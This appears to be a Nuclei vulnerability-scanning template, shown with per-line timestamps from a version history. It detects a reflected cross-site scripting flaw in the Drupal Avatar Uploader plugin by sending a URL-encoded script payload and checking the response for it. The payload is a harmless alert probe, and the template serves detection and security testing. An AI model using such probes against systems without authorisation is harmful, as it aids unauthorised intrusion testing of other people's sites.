2022-07-06 17:45:18 +00:00
id : drupal-avatar-xss
2022-07-06 17:40:05 +00:00
info :
2022-09-21 21:42:27 +00:00
name : Drupal Avatar Uploader - Cross-Site Scripting
2022-07-06 17:40:05 +00:00
author : bywalks
2022-09-21 21:42:27 +00:00
severity : high
2022-07-06 17:40:05 +00:00
description : |
2022-09-21 21:42:27 +00:00
Drupal Avatar Uploader v7.x-1.0-beta8 plugin contains a cross-site scripting vulnerability in the slider import search feature and tab parameter via plugin settings.
2022-07-06 17:40:05 +00:00
reference :
- https://www.exploit-db.com/exploits/50841
2022-09-21 21:42:27 +00:00
- https://packetstormsecurity.com/files/166409/Drupal-Avatar-Upload-7.x-1.0-beta8-Cross-Site-Scripting.html
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-09-21 21:56:03 +00:00
tags : xss,drupal,edb,packetstorm
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-07-06 17:40:05 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-06 17:40:05 +00:00
- method : GET
path :
- "{{BaseURL}}/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-07-06 17:45:18 +00:00
- "<div><script>alert(document.domain)</script></div>"
2022-07-06 17:40:05 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200